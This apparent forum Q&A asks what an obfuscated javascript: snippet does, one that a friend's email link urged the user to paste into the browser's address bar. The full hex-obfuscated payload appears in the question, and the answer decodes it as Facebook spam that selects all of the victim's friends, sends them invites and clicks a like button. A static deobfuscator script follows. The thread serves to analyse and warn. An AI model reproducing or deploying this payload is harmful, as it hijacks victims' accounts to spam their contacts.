OK, someone who happens to be a good friend of mine is sending me some odd emails lately, one of which was a link to a page that asks you to copy and paste this into your address bar in your browser and then execute it ...
javascript:(function(){a='app125879300771588_jop';b='app125879300771588_jode';ifc='app125879300771588_ifc';ifo='app125879300771588_ifo';mw='app125879300771588_mwrapper';var _0xc100=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]]=_0xc100[3];d[_0xc100[2]](a)[_0xc100[4]]=d[_0xc100[2]](b)[_0xc100[5]];d[_0xc100[2]](_0xc100[7])[_0xc100[6]]();setTimeout(function (){fs[_0xc100[8]]();} ,5000);setTimeout(function (){SocialGraphManager[_0xc100[11]](_0xc100[9],_0xc100[10]);} ,5000);setTimeout(function (){d[_0xc100[2]](_0xc100[12])[_0xc100[6]]();d[_0xc100[2]](ifo)[_0xc100[4]]=d[_0xc100[2]](ifc)[_0xc100[5]];} ,5000);})();
Not being totally with it when it comes to low-level programming, I'm curious as to what the email is asking here ...
PLEASE DO NOT RUN THIS CODE UNLESS YOU ARE HAPPY THAT IT WILL NOT BREAK ANYTHING.
But ... Could someone tell me what it does?
I haven't completely decoded the code, but here are a couple of hints about it.
The variable _0xc100 defines an array of strings. The characters are encoded as hexadecimal, so it's more difficult to read them. So, for instance, \x76 equals "v".
You can safely alert(_0xc100); to see it in plain text.
var _0xc100 = ["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79",
"\x73\x74\x79\x6C\x65",
"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64",
"\x68\x69\x64\x64\x65\x6E",
"\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",
"\x76\x61\x6C\x75\x65",
"\x63\x6C\x69\x63\x6B",
"\x73\x75\x67\x67\x65\x73\x74",
"\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C",
"\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D",
"\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70",
"\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67",
"\x6C\x69\x6B\x65\x6D\x65"];
translates to an array containing these keywords:
visibility, style, getElementById, hidden, innerHTML, value, click, suggest, select_all, sgm_invite_form, /ajax/social_graph/invite_dialog.php, submitDialog, likeme
Now, the following statements (DON'T EXECUTE THOSE) use these keywords to actually execute functions.
For instance:
d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]] = _0xc100[3];
is equivalent to (d is defined as document and mw is defined at the top)
document.getElementById("app125879300771588_mwrapper").style.visibility = "hidden";
which hides an element called app125879300771588_mwrapper
the following instructions give
document.getElementById("app125879300771588_jop").innerHTML = document.getElementById("app125879300771588_jode").value;
which copies the content of app125879300771588_jop into app125879300771588_jode
and
document.getElementById("suggest").click();
which I guess clicks some "suggest" button.
Finally, it sets 3 setTimeout functions, to execute 3 commands after 5 seconds (the 5000)
They translate to
setTimeout(function () {
    // the original statement is fs[_0xc100[8]](), i.e. a call on the fs object
    fs.select_all();
}, 5000);
Which I assume selects all your friends...
setTimeout(function () {
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);
... send them invites
setTimeout(function () {
    document.getElementById("likeme").click();
    document.getElementById("app125879300771588_ifo").innerHTML =
        document.getElementById("app125879300771588_ifc").value;
}, 5000);
... and presses a like button
Note that I don't use Facebook, and I don't know the ins and outs of it but I guess it's pretty clear that this code is malicious.
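The manual decoding in the answer above can be done mechanically without ever running the script. This is an added example, not part of the original answer: it treats the source purely as text, decodes the \xNN string table and substitutes each table reference, with no eval. The function names are introduced here, and SAMPLE is a shortened excerpt of the payload quoted in the question (its first four table entries and first statement).

```javascript
// Static deobfuscation of a hex-escaped string table. The script is handled
// purely as text: nothing here evals or runs the suspicious code.

// Excerpt of the payload above: first four table entries, first statement.
const SAMPLE = String.raw`var _0xc100=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E"];d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]]=_0xc100[3];`;

// Decode \xNN escapes found in the body of one string literal.
function decodeHex(s) {
  return s.replace(/\\x([0-9A-Fa-f]{2})/g,
    (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Locate `var NAME=["...","..."];` and return the decoded table plus the
// remaining source with that declaration removed.
function extractTable(src) {
  const decl = /var\s+([A-Za-z_$][\w$]*)\s*=\s*\[((?:\s*"(?:[^"\\]|\\.)*"\s*,?)*)\]\s*;?/;
  const m = src.match(decl);
  if (!m) return null;
  const strings = [...m[2].matchAll(/"((?:[^"\\]|\\.)*)"/g)]
    .map((x) => decodeHex(x[1]));
  return { name: m[1], strings, rest: src.replace(m[0], "") };
}

function deobfuscate(src) {
  const t = extractTable(src);
  if (!t) return src; // no string table found: leave the input unchanged
  const name = t.name.replace(/\$/g, "\\$&"); // escape $ for use in a RegExp
  // Replace every NAME[i] with the quoted string it stands for.
  const refs = new RegExp(name + "\\[(\\d+)\\]", "g");
  let out = t.rest.replace(refs, (whole, i) =>
    Number(i) < t.strings.length ? JSON.stringify(t.strings[Number(i)]) : whole);
  // Rewrite obj["ident"] as obj.ident when the key is a plain identifier.
  out = out.replace(/\["([A-Za-z_$][\w$]*)"\]/g, ".$1");
  return out;
}

console.log(deobfuscate(SAMPLE));
```

Pasting the full payload into SAMPLE in place of the excerpt yields the readable form of every statement, which can then be reviewed line by line.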